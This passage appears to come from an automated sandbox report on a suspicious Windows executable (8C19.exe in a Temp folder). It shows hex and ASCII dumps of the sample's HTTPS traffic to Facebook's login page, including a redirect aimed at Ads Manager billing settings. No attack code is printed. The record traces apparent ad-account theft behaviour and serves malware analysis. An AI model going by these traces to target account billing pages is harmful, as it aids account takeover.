72 6d 5f 6f 61 75 74 68 5f 63 6c 69 65 6e 74 5f 65 76 65 6e 74 73 3a 74 72 75 65 2c 67 72 61 70
                                                                                                                                  Data Ascii: ls2IdSTyjZS2VHU779XrTa-g"]},-1],["BanzaiConfig",[],{MAX_SIZE:10000,MAX_WAIT:150000,MIN_WAIT:null,RESTORE_WAIT:150000,blacklist:["time_spent"],disabled:false,gks:{boosted_pagelikes:true,mercury_send_error_logging:true,platform_oauth_client_events:true,grap
                                                                                                                                  2022-10-17 20:07:24 UTC1731INData Raw: 31 30 61 36 0d 0a 47 6b 6c 6d 4e 32 58 32 65 79 30 30 6a 73 34 7a 38 6b 39 78 77 61 73 67 4c 66 78 68 50 6d 5f 63 33 73 42 65 4d 6a 61 43 46 44 5a 53 37 6d 4c 4a 62 73 77 69 54 39 4a 77 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 38 33 38 34 34 22 2c 5b 5d 2c 7b 5f 5f 72 63 3a 5b 6e 75 6c 6c 2c 22 41 61 33 49 39 4c 6b 76 35 46 54 49 57 74 37 42 36 4c 59 67 59 49 62 64 39 55 78 52 53 36 71 76 77 43 67 46 74 64 44 41 66 31 4a 6c 57 64 75 30 30 72 6b 71 6a 79 46 6e 6f 49 6c 73 32 49 64 53 54 79 6a 5a 53 32 56 48 55 37 37 39 58 72 54 61 2d 67 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 33 34 34 34 38 37 22 2c 5b 22 52 65 61 63 74 44 4f 4d 46 6f 72 6b 65 64 2d 70 72 6f 64 2e 63 6c 61 73 73 69 63 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 52 65 61 63 74 44 4f 4d 46 6f 72 6b
                                                                                                                                  Data Ascii: 10a6GklmN2X2ey00js4z8k9xwasgLfxhPm_c3sBeMjaCFDZS7mLJbswiT9Jw"]},-1],["cr:983844",[],{__rc:[null,"Aa3I9Lkv5FTIWt7B6LYgYIbd9UxRS6qvwCgFtdDAf1JlWdu00rkqjyFnoIls2IdSTyjZS2VHU779XrTa-g"]},-1],["cr:1344487",["ReactDOMForked-prod.classic"],{__rc:["ReactDOMFork
                                                                                                                                  2022-10-17 20:07:24 UTC1732INData Raw: 58 68 68 36 44 32 6c 37 42 43 5f 62 54 63 5a 49 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 31 38 37 31 35 39 22 2c 5b 22 42 6c 75 65 43 6f 6d 70 61 74 42 72 6f 6b 65 72 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 42 6c 75 65 43 6f 6d 70 61 74 42 72 6f 6b 65 72 22 2c 22 41 61 32 2d 70 6e 68 59 30 6a 7a 73 6b 38 59 47 58 57 4f 67 5f 72 6d 30 6b 34 61 79 57 76 44 2d 57 6a 51 4f 30 58 71 47 4b 4c 55 6d 76 63 42 5a 4b 42 35 73 64 36 46 57 56 44 59 62 5a 41 63 66 65 32 43 38 5a 37 6a 31 4f 73 34 58 68 68 36 44 32 6c 37 42 43 5f 62 54 63 5a 49 22 5d 7d 2c 2d 31 5d 2c 5b 22 49 6d 6d 65 64 69 61 74 65 41 63 74 69 76 65 53 65 63 6f 6e 64 73 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 73 61 6d 70 6c 69 6e 67 5f 72 61 74 65 3a 30 7d 2c 34 32 33 5d 5d 2c 72 65 71 75 69 72 65 3a 5b 5b 22
                                                                                                                                  Data Ascii: Xhh6D2l7BC_bTcZI"]},-1],["cr:1187159",["BlueCompatBroker"],{__rc:["BlueCompatBroker","Aa2-pnhY0jzsk8YGXWOg_rm0k4ayWvD-WjQO0XqGKLUmvcBZKB5sd6FWVDYbZAcfe2C8Z7j1Os4Xhh6D2l7BC_bTcZI"]},-1],["ImmediateActiveSecondsConfig",[],{sampling_rate:0},423]],require:[["
                                                                                                                                  2022-10-17 20:07:24 UTC1734INData Raw: 5d 5d 2c 5b 22 54 69 6d 65 53 70 65 6e 74 42 69 74 41 72 72 61 79 4c 6f 67 67 65 72 22 2c 22 69 6e 69 74 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 44 65 66 65 72 72 65 64 43 6f 6f 6b 69 65 22 2c 22 61 64 64 54 6f 51 75 65 75 65 22 2c 5b 5d 2c 5b 22 5f 6a 73 5f 64 61 74 72 22 2c 22 5f 4c 56 4e 59 2d 61 6b 50 2d 6d 6d 5a 6e 6f 35 38 51 72 59 74 77 68 52 22 2c 36 33 30 37 32 30 30 30 30 30 30 2c 22 2f 22 2c 74 72 75 65 2c 66 61 6c 73 65 2c 74 72 75 65 5d 5d 2c 5b 22 44 65 66 65 72 72 65 64 43 6f 6f 6b 69 65 22 2c 22 61 64 64 54 6f 51 75 65 75 65 22 2c 5b 5d 2c 5b 22 5f 6a 73 5f 73 62 22 2c 22 5f 4c 56 4e 59 35 63 59 39 32 63 67 31 50 57 58 54 72 73 6f 79 46 45 5a 22 2c 36 33 30 37 32 30 30 30 30 30 30 2c 22 2f 22 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 74 72 75 65 5d
                                                                                                                                  Data Ascii: ]],["TimeSpentBitArrayLogger","init",[],[]],["DeferredCookie","addToQueue",[],["_js_datr","_LVNY-akP-mmZno58QrYtwhR",63072000000,"/",true,false,true]],["DeferredCookie","addToQueue",[],["_js_sb","_LVNY5cY92cg1PWXTrsoyFEZ",63072000000,"/",false,false,true]
                                                                                                                                  2022-10-17 20:07:24 UTC1735INData Raw: 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  2192.168.2.549699157.240.20.35443C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-10-17 20:07:01 UTC222OUTGET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                  Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                  Host: www.facebook.com
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                  viewport-width: 1920
                                                                                                                                  sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  sec-ch-prefers-color-scheme: light
                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                  2022-10-17 20:07:01 UTC223INHTTP/1.1 200 OK
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                                                                                                  x-fb-rlafr: 0
                                                                                                                                  content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                                                                  2022-10-17 20:07:01 UTC224INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 3b 73 74 79 6c 65 2d 73 72 63 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 64 61 74 61 3a 20 2a 2e 66 61 63 65 62
                                                                                                                                  Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.faceb
                                                                                                                                  2022-10-17 20:07:01 UTC226INData Raw: 63 65 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73 73 3d 22 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 78 46 67 69 6a 41 33 64 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d 61
                                                                                                                                  Data Ascii: ce26<!DOCTYPE html><html lang="en" id="facebook" class="no_js"><head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="xFgijA3d">function envFlush(a){function b(b){for(var c in a)b[c]=a
                                                                                                                                  2022-10-17 20:07:01 UTC228INData Raw: 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e 69 63 61 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2f 77 65 62 2f 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73
                                                                                                                                  Data Ascii: com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link rel="shortcut icon" href="https
                                                                                                                                  2022-10-17 20:07:01 UTC229INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 53 2f 6c 2f 30 2c 63 72 6f 73 73 2f 74 35 5a 54 68 7a 32 42 34 77 4e 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 4b 41 6a 62 72 6c 2f 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 5f 2f 6c 2f 30 2c 63 72 6f 73 73 2f 76 63 50 71 54 69 52 77 49
                                                                                                                                  Data Ascii: ="https://static.xx.fbcdn.net/rsrc.php/v3/yS/l/0,cross/t5ZThz2B4wN.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="KAjbrl/" crossorigin="anonymous" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/y_/l/0,cross/vcPqTiRwI
                                                                                                                                  2022-10-17 20:07:01 UTC230INData Raw: 34 30 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 62 77 69 7a 57 67 44 61 46 51 75 64 6d 4c 36 45 22 7d 2c 22 31 31 36 37 33 39 34 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 42 70 4e 2d 74 6c 55 50 77 62 49 49 46 51 39 51 22 7d 2c 22 31 38 35 37 35 38 31 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 79 54 78 47 4d 70 36 6c 65 30 50 41 74 62 6d 38 22 7d 2c 22 32 37 37 32 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 45 75 32 34 34 57 49 63 65 37 69 77 71 6f 59 38 22 7d 2c 22 33 37 35 32 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 65 53 35 55 54 6b
                                                                                                                                  Data Ascii: 40":{"result":false,"hash":"AT5bwizWgDaFQudmL6E"},"1167394":{"result":false,"hash":"AT7BpN-tlUPwbIIFQ9Q"},"1857581":{"result":false,"hash":"AT5yTxGMp6le0PAtbm8"},"2772":{"result":false,"hash":"AT5Eu244WIce7iwqoY8"},"3752":{"result":false,"hash":"AT6eS5UTk
                                                                                                                                  2022-10-17 20:07:01 UTC232INData Raw: 67 22 2c 5b 5d 2c 7b 22 63 5f 75 73 65 72 22 3a 7b 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 63 70 70 6f 22 3a 7b 22 74 22 3a 38 36 34 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 64 70 72 22 3a 7b 22 74 22 3a 36 30 34 38 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 66 62 6c 5f 63 69 22 3a 7b 22 74 22 3a 33 31 35 33 36 30 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 66 62 6c 5f 63 73 22 3a 7b 22 74 22 3a 33 31 35 33 36 30 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 66 62 6c 5f 73 74 22 3a 7b 22 74 22 3a 33 31 35 33 36 30 30 30 2c 22 73 22 3a 22 53 74 72 69 63 74 22 7d 2c 22 69 5f 75 73 65 72 22 3a 7b 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 6c 6f 63 61 6c 65 22 3a 7b 22 74 22 3a 36 30 34 38 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 6d 5f 6c
                                                                                                                                  Data Ascii: g",[],{"c_user":{"s":"None"},"cppo":{"t":86400,"s":"None"},"dpr":{"t":604800,"s":"None"},"fbl_ci":{"t":31536000,"s":"None"},"fbl_cs":{"t":31536000,"s":"None"},"fbl_st":{"t":31536000,"s":"Strict"},"i_user":{"s":"None"},"locale":{"t":604800,"s":"None"},"m_l
                                                                                                                                  2022-10-17 20:07:01 UTC233INData Raw: 73 74 5f 62 61 73 65 5f 75 72 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 22 2c 22 6d 61 6e 69 66 65 73 74 5f 6f 72 69 67 69 6e 22 3a 6e 75 6c 6c 2c 22 62 65 5f 6f 6e 65 5f 61 68 65 61 64 22 3a 66 61 6c 73 65 2c 22 69 73 5f 72 74 6c 22 3a 66 61 6c 73 65 2c 22 69 73 5f 63 6f 6d 65 74 22 3a 66 61 6c 73 65 2c 22 69 73 5f 65 78 70 65 72 69 6d 65 6e 74 61 6c 5f 74 69 65 72 22 3a 66 61 6c 73 65 2c 22 69 73 5f 6a 69 74 5f 77 61 72 6d 65 64 5f 75 70 22 3a 74 72 75 65 2c 22 68 73 69 22 3a 22 37 31 35 35 35 37 35 33 37 38 36 37 38 35 37 32 32 38 37 22 2c 22 73 65 6d 72 5f 68 6f 73 74 5f 62 75 63 6b 65 74 22 3a 22 33 22 2c 22 62 6c 5f 68 61 73 68 5f 76 65 72 73 69 6f 6e 22 3a 32 2c 22 73 6b 69 70 5f 72 64 5f 62
                                                                                                                                  Data Ascii: st_base_uri":"https:\/\/static.xx.fbcdn.net","manifest_origin":null,"be_one_ahead":false,"is_rtl":false,"is_comet":false,"is_experimental_tier":false,"is_jit_warmed_up":true,"hsi":"7155575378678572287","semr_host_bucket":"3","bl_hash_version":2,"skip_rd_b
                                                                                                                                  2022-10-17 20:07:01 UTC235INData Raw: 53 49 4e 45 53 53 5f 47 52 41 50 48 5f 53 45 54 54 49 4e 47 5f 57 41 42 41 5f 41 53 53 49 47 4e 45 44 5f 55 53 45 52 53 5f 4e 45 57 5f 41 50 49 22 2c 22 41 44 53 5f 50 4c 41 43 45 4d 45 4e 54 5f 46 49 58 5f 50 55 42 4c 49 53 48 45 52 5f 50 4c 41 54 46 4f 52 4d 53 5f 4d 55 54 41 54 49 4f 4e 22 2c 22 46 4f 52 43 45 5f 46 45 54 43 48 5f 42 4f 4f 53 54 45 44 5f 43 4f 4d 50 4f 4e 45 4e 54 5f 41 46 54 45 52 5f 41 44 53 5f 43 52 45 41 54 49 4f 4e 22 2c 22 56 49 44 45 4f 5f 44 49 4d 45 4e 53 49 4f 4e 53 5f 46 52 4f 4d 5f 50 4c 41 59 45 52 5f 49 4e 5f 55 50 4c 4f 41 44 5f 44 49 41 4c 4f 47 22 2c 22 53 4e 49 56 59 5f 47 52 4f 55 50 5f 42 59 5f 45 56 45 4e 54 5f 54 52 41 43 45 5f 49 44 5f 41 4e 44 5f 4e 41 4d 45 22 2c 22 41 44 53 5f 53 54 4f 52 45 5f 56 49 53 49 54
                                                                                                                                  Data Ascii: SINESS_GRAPH_SETTING_WABA_ASSIGNED_USERS_NEW_API","ADS_PLACEMENT_FIX_PUBLISHER_PLATFORMS_MUTATION","FORCE_FETCH_BOOSTED_COMPONENT_AFTER_ADS_CREATION","VIDEO_DIMENSIONS_FROM_PLAYER_IN_UPLOAD_DIALOG","SNIVY_GROUP_BY_EVENT_TRACE_ID_AND_NAME","ADS_STORE_VISIT
                                                                                                                                  2022-10-17 20:07:01 UTC236INData Raw: 61 53 74 6f 72 65 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 65 78 70 61 6e 64 6f 4b 65 79 22 3a 22 5f 5f 46 42 5f 53 54 4f 52 45 22 2c 22 75 73 65 45 78 70 61 6e 64 6f 22 3a 74 72 75 65 7d 2c 32 39 31 35 5d 2c 5b 22 43 6f 6f 6b 69 65 43 6f 72 65 4c 6f 67 67 69 6e 67 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 6d 61 78 69 6d 75 6d 49 67 6e 6f 72 61 62 6c 65 53 74 61 6c 6c 4d 73 22 3a 31 36 2e 36 37 2c 22 73 61 6d 70 6c 65 52 61 74 65 22 3a 39 2e 37 65 2d 35 2c 22 73 61 6d 70 6c 65 52 61 74 65 43 6c 61 73 73 69 63 22 3a 31 2e 30 65 2d 31 30 2c 22 73 61 6d 70 6c 65 52 61 74 65 46 61 73 74 53 74 61 6c 65 22 3a 31 2e 30 65 2d 38 7d 2c 33 34 30 31 5d 2c 5b 22 49 6d 6d 65 64 69 61 74 65 49 6d 70 6c 65 6d 65 6e 74 61 74 69 6f 6e 45 78 70 65 72 69 6d 65 6e 74 73 22 2c 5b
                                                                                                                                  Data Ascii: aStoreConfig",[],{"expandoKey":"__FB_STORE","useExpando":true},2915],["CookieCoreLoggingConfig",[],{"maximumIgnorableStallMs":16.67,"sampleRate":9.7e-5,"sampleRateClassic":1.0e-10,"sampleRateFastStale":1.0e-8},3401],["ImmediateImplementationExperiments",[
                                                                                                                                  2022-10-17 20:07:01 UTC238INData Raw: 6a 4a 66 65 4b 70 72 6c 55 55 4f 31 51 53 30 6f 45 71 5a 75 66 64 22 2c 22 61 6c 6c 6f 77 6c 69 73 74 65 64 5f 69 66 72 61 6d 65 73 22 3a 5b 5d 7d 2c 35 35 34 30 5d 2c 5b 22 42 69 67 50 69 70 65 45 78 70 65 72 69 6d 65 6e 74 73 22 2c 5b 5d 2c 7b 22 6c 69 6e 6b 5f 69 6d 61 67 65 73 5f 74 6f 5f 70 61 67 65 6c 65 74 73 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 62 69 67 70 69 70 65 5f 70 6c 75 67 69 6e 73 22 3a 66 61 6c 73 65 7d 2c 39 30 37 5d 2c 5b 22 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 48 6f 6c 64 6f 75 74 22 2c 5b 5d 2c 7b 22 64 69 73 61 62 6c 65 5f 76 61 72 69 61 74 69 6f 6e 22 3a 66 61 6c 73 65 7d 2c 36 35 33 33 5d 2c 5b 22 41 73 79 6e 63 52 65 71 75 65 73 74 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 72 65 74 72 79 4f 6e 4e 65 74 77 6f 72 6b 45 72
                                                                                                                                  Data Ascii: jJfeKprlUUO1QS0oEqZufd","allowlisted_iframes":[]},5540],["BigPipeExperiments",[],{"link_images_to_pagelets":false,"enable_bigpipe_plugins":false},907],["IntlVariationHoldout",[],{"disable_variation":false},6533],["AsyncRequestConfig",[],{"retryOnNetworkEr
                                                                                                                                  2022-10-17 20:07:01 UTC239INData Raw: 6f 6e 73 5f 61 6e 64 72 6f 69 64 2e 6a 73 6f 6e 22 3a 30 2c 22 5c 2f 63 6f 6e 6e 65 63 74 5c 2f 6a 73 64 69 61 6c 6f 67 5c 2f 4d 50 6c 61 74 66 6f 72 6d 41 70 70 49 6e 76 69 74 65 73 4a 53 44 69 61 6c 6f 67 5c 2f 22 3a 30 2c 22 5c 2f 63 6f 6e 6e 65 63 74 5c 2f 6a 73 64 69 61 6c 6f 67 5c 2f 4d 50 6c 61 74 66 6f 72 6d 4f 41 75 74 68 53 68 69 6d 4a 53 44 69 61 6c 6f 67 5c 2f 22 3a 30 2c 22 5c 2f 63 6f 6e 6e 65 63 74 5c 2f 6a 73 64 69 61 6c 6f 67 5c 2f 4d 50 6c 61 74 66 6f 72 6d 4c 69 6b 65 4a 53 44 69 61 6c 6f 67 5c 2f 22 3a 30 2c 22 5c 2f 71 70 5c 2f 69 6e 74 65 72 73 74 69 74 69 61 6c 5c 2f 22 3a 31 2c 22 5c 2f 71 70 5c 2f 61 63 74 69 6f 6e 5c 2f 72 65 64 69 72 65 63 74 5c 2f 22 3a 31 2c 22 5c 2f 71 70 5c 2f 61 63 74 69 6f 6e 5c 2f 63 6c 6f 73 65 5c 2f 22
                                                                                                                                  Data Ascii: ons_android.json":0,"\/connect\/jsdialog\/MPlatformAppInvitesJSDialog\/":0,"\/connect\/jsdialog\/MPlatformOAuthShimJSDialog\/":0,"\/connect\/jsdialog\/MPlatformLikeJSDialog\/":0,"\/qp\/interstitial\/":1,"\/qp\/action\/redirect\/":1,"\/qp\/action\/close\/"
                                                                                                                                  2022-10-17 20:07:01 UTC241INData Raw: 72 74 65 72 5c 2f 22 3a 31 2c 22 5c 2f 63 72 2e 70 68 70 22 3a 31 2c 22 5c 2f 6c 65 67 61 6c 5c 2f 74 65 72 6d 73 5c 2f 22 3a 31 2c 22 5c 2f 6c 6f 67 69 6e 2e 70 68 70 22 3a 31 2c 22 5c 2f 6c 6f 67 69 6e 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 61 63 63 6f 75 6e 74 5c 2f 22 3a 31 2c 22 5c 2f 6e 5c 2f 22 3a 31 2c 22 5c 2f 72 65 6d 6f 74 65 5f 74 65 73 74 5f 64 65 76 69 63 65 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 62 75 79 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 62 75 79 63 6f 6e 66 69 72 6d 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 62 75 79 72 65 73 75 6c 74 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 70 72 6f 6d 6f 73 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 63 6f 6e 74 69 6e 75 65 5c 2f 22 3a 31
                                                                                                                                  Data Ascii: rter\/":1,"\/cr.php":1,"\/legal\/terms\/":1,"\/login.php":1,"\/login\/":1,"\/mobile\/account\/":1,"\/n\/":1,"\/remote_test_device\/":1,"\/upsell\/buy\/":1,"\/upsell\/buyconfirm\/":1,"\/upsell\/buyresult\/":1,"\/upsell\/promos\/":1,"\/upsell\/continue\/":1
                                                                                                                                  2022-10-17 20:07:01 UTC242INData Raw: 65 74 75 72 6e 20 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 73 2e 4e 55 4d 42 45 52 5f 4f 54 48 45 52 3b 20 7d 22 7d 2c 33 34 30 35 5d 2c 5b 22 53 65 72 76 65 72 54 69 6d 65 44 61 74 61 22 2c 5b 5d 2c 7b 22 73 65 72 76 65 72 54 69 6d 65 22 3a 31 36 36 36 30 33 37 32 32 31 31 39 34 2c 22 74 69 6d 65 4f 66 52 65 71 75 65 73 74 53 74 61 72 74 22 3a 31 36 36 36 30 33 37 32 32 31 31 35 31 2e 37 2c 22 74 69 6d 65 4f 66 52 65 73 70 6f 6e 73 65 53 74 61 72 74 22 3a 31 36 36 36 30 33 37 32 32 31 31 35 31 2e 37 7d 2c 35 39 34 33 5d 2c 5b 22 46 62 74 51 54 4f 76 65 72 72 69 64 65 73 22 2c 5b 5d 2c 7b 22 6f 76 65 72 72 69 64 65 73 22 3a 7b 7d 7d 2c 35 35 31 5d 2c 5b 22 41 6e 61 6c 79 74 69 63 73 43 6f 72 65 44 61 74 61 22 2c 5b 5d 2c 7b 22 64 65 76 69 63 65 5f 69 64 22
                                                                                                                                  Data Ascii: eturn IntlVariations.NUMBER_OTHER; }"},3405],["ServerTimeData",[],{"serverTime":1666037221194,"timeOfRequestStart":1666037221151.7,"timeOfResponseStart":1666037221151.7},5943],["FbtQTOverrides",[],{"overrides":{}},551],["AnalyticsCoreData",[],{"device_id"
